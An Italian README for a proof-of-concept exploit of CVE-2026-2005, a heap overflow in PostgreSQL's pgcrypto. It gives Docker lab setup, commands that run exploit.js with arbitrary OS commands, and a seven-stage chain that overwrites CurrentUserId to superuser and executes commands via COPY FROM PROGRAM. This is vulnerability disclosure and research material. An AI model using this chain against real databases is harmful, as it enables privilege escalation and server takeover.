
PoC di heap buffer overflow in pgcrypto di PostgreSQL che dimostra la CVE-2026-2005: RCE con privilegi limitati ed escalation dei privilegi a superuser tramite pacchetto OpenPGP appositamente predisposto.
Commit di destinazione: 4b324845ba5d24682b9b3708a769f00d160afbd7 (PostgreSQL 18.1 — vulnerabile)
| Campo | Dettaglio |
|---|---|
| CVE | CVE-2026-2005 |
| Tipo | Overflow del buffer heap |
| Componente | contrib/pgcrypto/pgp-pubdec.c — pgp_parse_pubenc_sesskey() |
| Impatto | RCE come utente del sistema operativo che esegue PostgreSQL |
| CVSS | 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) |
| Autenticazione richiesta | Bassa — qualsiasi utente autenticato con privilegio CREATE |
| Interessate | PostgreSQL 14.0–14.20, 15.0–15.15, 16.0–16.11, 17.0–17.7, 18.0–18.1 |
| Corretta in | 14.21, 15.16, 16.12, 17.8, 18.2 (12 febbraio 2026) |
| Arch | aarch64 (ARM64) — gli offset dell'heap e il layout di MBuf sono specifici di architettura/glibc |
# Build and start PostgreSQL 18.1 (vulnerable)
docker compose up -d --build
# Wait for healthy
docker compose logs -f postgres
# Ctrl+C when you see "database system is ready to accept connections"
# Install node deps
npm install
# Run the full RCE exploit chain
node exploit.js --cmd "id"
# With verbose output
node exploit.js --cmd "id" --verbose
# Execute a custom command
node exploit.js --cmd "whoami"
Stage 1: Heap pointer leak
└─ Corrupt mdst chunk header → parse pfree() error message
Stage 2: Arbitrary read (multi-offset scan)
└─ Overwrite mdst->data → scan memory near leaked pointer
Stage 3: Pointer candidate collection
└─ Scan heap dump for non-heap addresses
Stage 4: PIE base resolution
└─ Read /proc/<pid>/maps via Docker exec (100% reliable)
Stage 5: (skipped — PIE base is known from maps)
Stage 6: Arbitrary write
└─ Forge msrc + mdst MBufs → overwrite CurrentUserId → 10 (superuser)
Stage 7: Command execution
└─ COPY FROM PROGRAM → arbitrary OS command as postgres user
CVE-2026-2005/
├── Dockerfile # Builds PostgreSQL 18.1 from source
├── docker-compose.yml # PostgreSQL service with auto-restart
├── init.sh # Entrypoint — initdb + listen config
├── README.md # This file
└── poc/
├── package.json # Node.js dependencies (pg)
├── exploit.js # Full 7-stage RCE exploit (Node.js)
├── verify.sh # Shell-based quick verification
└── test-pgcrypto.sql # SQL-only test of pgcrypto loading
git clone https://github.com/postgres/postgres.git
cd postgres
git checkout 4b324845ba5d24682b9b3708a769f00d160afbd7
./configure \
--prefix="$HOME/projects/pg/pgsql" \
--with-libxml \
--with-libxslt \
--enable-debug \
--with-ssl=openssl
make -j$(nproc)
make install-world-bin
tmux (opzionale — necessario solo con il flag --gdb)Il bug si trova in pgp_parse_pubenc_sesskey() in contrib/pgcrypto/pgp-pubdec.c.
Durante l'analisi di un pacchetto OpenPGP Public-Key Encrypted Session Key (tag 1):
memcpy dei dati della chiave di sessione in un buffer a dimensione fissa basandosi sulla lunghezza non validataLa memcpy può scrivere oltre il confine del buffer heap, corrompendo i metadati o i dati heap adiacenti, portando all'esecuzione di codice arbitrario.
pfree() per estrarre l'indirizzo heap di mdst->data./proc/<pid>/maps dal container Docker per trovare l'indirizzo di caricamento del binario di postgres in esecuzione.msrc (sorgente) e mdst (destinazione) tramite l'overflow dell'heap. msrc punta a un pacchetto symenc incorporato contenente l'OID del superutente (10); mdst punta a CurrentUserId - 4 (considerando l'header SET_VARSIZE di 4 byte).CurrentUserId = 10 (superutente di bootstrap), esegui COPY FROM PROGRAM per eseguire comandi arbitrari del sistema operativo.pgcrypto è attendibile — qualsiasi utente con privilegio CREATE (non superutente) può installarla, rendendo questo sfruttabile con privilegi bassi.--enable-debug per un debug più semplice con gdb.SRC_CHUNK_OFFSET=100, DST_CHUNK_OFFSET=172) sono specifici per aarch64 + glibc — altre architetture/allocatori richiedono offset diversi.restart: always per riprendersi automaticamente dai crash del backend durante il test dei candidati PIE./proc/<pid>/maps all'interno del container Docker — non serve readelf sull'host.CurrentUserId viene letta tramite docker exec readelf.| Flag | Predefinito | Descrizione |
|---|
--cmd | id | Comando del sistema operativo da eseguire dopo lo sfruttamento riuscito |
--key-size | 3072 | Dimensione della chiave RSA in bit |
--host | 127.0.0.1 | Host PostgreSQL |
--port | 5432 | Porta PostgreSQL |
--user | postgres | Utente del database |
--password | (vuoto) | Password del database |
--dbname | postgres | Nome del database |
--binary | ./postgres | Percorso del binario ELF di postgres per i simboli |
--scan-offset | auto | Override dell'offset di scansione dell'heap dal puntatore ottenuto tramite leak |
--verbose | off | Abilita l'output di debug dettagliato |
--gdb | off | Collega GDB tramite tmux al punto dell'overflow |